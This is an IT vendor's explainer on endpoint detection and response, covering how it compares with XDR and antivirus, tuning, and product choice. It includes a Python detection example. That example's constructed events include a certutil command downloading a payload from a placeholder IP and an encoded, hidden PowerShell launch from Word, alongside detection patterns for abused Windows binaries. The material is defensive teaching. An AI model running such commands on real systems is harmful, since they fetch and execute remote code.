Endpoint detection and response (EDR) definition
What is an Endpoint?
An endpoint is a computing device that runs its own operating system and connects to the network - desktop, laptop, mobile, tablet - and is used directly by individuals to undertake tasks. The term is often used to differentiate user devices from infrastructure such as servers, but in security tooling the word is broader: servers and virtual machines are endpoints too, and EDR agents are routinely deployed on them.
What is an EDR?
Endpoint Detection and Response (EDR) is a modern cybersecurity solution that operates at endpoint level, as an agent on each device. It continuously records what the device is doing (processes started, files written, network connections, registry and persistence changes), analyses that telemetry for signs of attack, and gives the security team response actions such as terminating a process, quarantining a file or isolating the host from the network.
What is an XDR?
Extended Detection and Response (XDR) is a newer cybersecurity solution that operates centrally. It correlates information from a range of inputs, including data from EDR agents as well as network, email, identity and cloud telemetry, and provides a single profile of threat status throughout an organisation.
What is the difference between EDR and XDR?
EDR is comprehensive protection for individual endpoints, but its view is limited to what happens on those endpoints. XDR combines many inputs so that it can recognise and respond to co-ordinated attacks across multiple vectors: a phishing email, a compromised account and a malicious process on a laptop are seen as one incident rather than three unrelated events.
Why is endpoint detection and response important?
Security is a primary concern for any computer system: it keeps your data safe and your business protected against attack. As interconnectivity grows and digital services become the norm, attackers increasingly use cyber attacks as the vector to steal from their victims. Because attacks are becoming more sophisticated and harder for victims to spot, a broad, robust defence is more important than ever.
Endpoint detection and response benefits
EDR developed from previous generations of protection - like antivirus - to meet modern attack methods. Crypto (ransomware) attacks, phishing and living off the land (abusing legitimate built-in tools such as PowerShell) can all compromise a device without dropping a file that matches a known signature, so antivirus alone will not prevent them. EDR instead watches device behaviour, flags activity that deviates from normal, and gives the business both visibility of what is happening and the means to respond.
How does endpoint detection and response work?
Discover and control - collect telemetry from every process on the device and identify behaviour that deviates from normal
Detect and defuse in real time - single out the offending process and terminate it, quarantine the file or isolate the host
Automatic incident response - pre-agreed policies empower the EDR to take action wherever and whenever the activity occurs
Instantly stop attacks - no delay waiting for a response from a central team
Minimise business impact - containing a wide range of attacks at the first sign means business operations are not disrupted by cyberthreats
Endpoint detection and response vs antivirus
Antivirus is a scanning technology: it holds a library of 'fingerprints' (signatures) of known malicious files, compares files against them, and blocks any match. Modern attacks frequently involve no such file; they abuse legitimate, signed system tools, run code only in memory, or take advantage of a person's inability to tell a genuine message from a fake one. The security layer in an EDR therefore works by identifying and halting suspicious behaviour, based on a wide range of signals such as which process launched which, what command line it used and what it connected to, rather than by matching a file against a list.
How to implement EDR
EDR can be delivered as a feature integrated with the operating system or installed as a third-party agent like any other piece of software. The central management console needs to be configured with the correct policy profiles for the endpoints it protects. The monitoring component usually needs tuning: exclusions for known, expected behaviour (an RMM agent running scripts, a backup tool touching many files) reduce the excess 'chatter' and false positives, so that the monitoring team is alerted only when something genuinely needs attention.
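To make the 'how it works', 'EDR vs antivirus' and tuning sections above concrete, here is an added example, written for this page and not Bitdefender's or any other vendor's code. It runs a signature check and a handful of behavioural rules over a few constructed process-creation events with Sysmon-style field names. The hashes, paths, base64 fragments, the RMM agent and its allowlist entry are all invented for the example. The known-bad file is caught by its hash, as antivirus would catch it; the Word-spawns-PowerShell and certutil download events carry the clean hash of a legitimate system binary and are caught only by behaviour; the allowlist shows how tuning suppresses a known-good pattern without switching the rule off.

```python
"""Signature matching versus behavioural detection over process telemetry.
Added example, not Bitdefender's or any vendor's code. Field names follow Sysmon
Event ID 1 (process creation); every event, path, hash and blob is constructed."""
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# The antivirus view: fingerprints of files already known to be bad (placeholder hash).
KNOWN_BAD_SHA256 = {"0" * 63 + "1"}

# -EncodedCommand and its common abbreviations.
ENCODED_CMD = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)(?:\s|$)")

# Living-off-the-land: signed Windows binaries abused to fetch or run code.
LOLBIN_PATTERNS = {
    "certutil.exe": ("-urlcache", "-decode"),
    "regsvr32.exe": ("/i:http", "scrobj.dll"),
    "mshta.exe": ("http://", "https://", "javascript:"),
}

# Tuning: (parent, child, command-line fragment) triples baselined as expected in
# this organisation. Constructed for the example; build yours from your own baseline.
DEFAULT_ALLOWLIST = [("rmmagent.exe", "powershell.exe", "-encodedcommand")]

# Automatic response policy keyed on severity.
ACTIONS = {"critical": "quarantine_file", "high": "kill_process"}


@dataclass
class Alert:
    rule: str
    severity: str
    action: str
    pid: int
    command_line: str

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def rule_known_bad_hash(ev):
    if ev["sha256"].lower() in KNOWN_BAD_SHA256:
        return "known_bad_hash", "critical"

def rule_office_spawns_script_host(ev):
    if basename(ev["parent_image"]) in OFFICE_APPS and basename(ev["image"]) in SCRIPT_HOSTS:
        return "office_spawns_script_host", "high"

def rule_suspicious_powershell(ev):
    cl = ev["command_line"].lower()
    if basename(ev["image"]) in POWERSHELL and (
            ENCODED_CMD.search(cl) or "downloadstring" in cl or "invoke-expression" in cl):
        return "suspicious_powershell", "high"

def rule_lolbin_abuse(ev):
    cl = ev["command_line"].lower()
    if any(frag in cl for frag in LOLBIN_PATTERNS.get(basename(ev["image"]), ())):
        return "lolbin_abuse", "high"

RULES = [rule_known_bad_hash, rule_office_spawns_script_host, rule_suspicious_powershell, rule_lolbin_abuse]

def is_allowlisted(ev, allowlist) -> bool:
    parent, child, cl = basename(ev["parent_image"]), basename(ev["image"]), ev["command_line"].lower()
    return any(parent == p and child == c and frag in cl for p, c, frag in allowlist)

def detect(events, allowlist=DEFAULT_ALLOWLIST):
    """Run every rule over every event; tuning never suppresses a signature hit."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit is None or (hit[0] != "known_bad_hash" and is_allowlisted(ev, allowlist)):
                continue
            alerts.append(Alert(hit[0], hit[1], ACTIONS[hit[1]], ev["pid"], ev["command_line"]))
    return alerts

def ev(pid, parent, image, cmd, sha):
    return {"pid": pid, "parent_image": parent, "image": image, "command_line": cmd, "sha256": sha}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed telemetry; "b" * 64 stands in for the clean powershell.exe hash
    ev(4120, r"C:\Windows\explorer.exe", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
       "chrome.exe", "a" * 64),
    ev(5216, r"C:\Windows\explorer.exe", r"C:\Users\alice\Downloads\invoice.exe", "invoice.exe", "0" * 63 + "1"),
    ev(5388, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS,
       "powershell.exe -nop -w hidden -enc SQBFAFgA", "b" * 64),
    ev(5402, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
       "certutil.exe -urlcache -split -f http://203.0.113.10/p.bin C:\\Users\\Public\\p.bin", "c" * 64),
    ev(6010, r"C:\Program Files\RMM\rmmagent.exe", PS, "powershell.exe -NoProfile -EncodedCommand RwBlAHQA", "b" * 64),
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"{a.severity:8} {a.rule:26} pid={a.pid} -> {a.action}")
```

Run as a script it prints four alerts: the downloaded invoice.exe by hash, the Word document's PowerShell child twice (parent/child relationship and encoded command), and the certutil download. The RMM agent's encoded PowerShell matches the same rule but is suppressed by the allowlist entry; calling detect(EVENTS, allowlist=[]) shows the fifth alert that an untuned deployment would raise. Note that the allowlist keys on parent, child and command-line fragment together, not on the child alone, so an attacker who simply launches powershell.exe from somewhere else does not inherit the exclusion.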
How to choose an EDR solution
There are several parameters to consider when choosing an EDR, but overriding all of them is the fact that a business is much more secure with any reputable EDR solution than with none. Factors such as detection performance, the resource footprint on the endpoint and total cost of ownership can be important; some solutions require in-depth knowledge and a 24-hour team to give their best. We have chosen Bitdefender Endpoint Security as our standard EDR because it offers a high level of performance in a cost-effective package, with good management and reporting capabilities.
Endpoint detection and response best practices
Assess which controls can actually be implemented without preventing business operations. There is no point in a secure solution that halts the business.
EDR is one layer of the defences, so do not assume that EDR alone will keep you secure. Consider and deploy other layers, such as patching and user awareness training.
Design the network so that a compromised endpoint cannot freely reach others: segmentation and least-privilege access limit how far an attack can spread.
Audit and monitor the output from the EDR, and regularly check that the agent is deployed, running and reporting on every device that needs it. A device with no agent, or one whose agent has been stopped, is a blind spot.
Endpoint detection and response configuration
Some EDRs require a high degree of customisation to give their best, and once tuned they provide the best performance with the least disruption for a given organisation. However, they need detailed setup knowledge and then a dedicated team to ensure the alerts generated are acted upon promptly, so they generally have a high cost of ownership. Other EDRs are designed to be low maintenance and largely autonomous, requiring a much lower investment of resources, but with a compromise in some other aspect of performance.
Cost of EDR
Total cost of ownership varies widely. As in most areas of technology, every solution has its own strengths: one product suits a particular sector, another a particular size of organisation; some work best on a single site, others with a distributed workforce. The equation to consider is value to the organisation: the cost of ownership against the potential cost of a compromise.
Flex IT has selected Bitdefender Endpoint Security as a highly effective solution in the SME space, combining a high level of autonomy and performance with a low cost of ownership. We combine EDR with a range of other protection layers to ensure our clients are well protected in their daily operations.
Contact us today to find out more.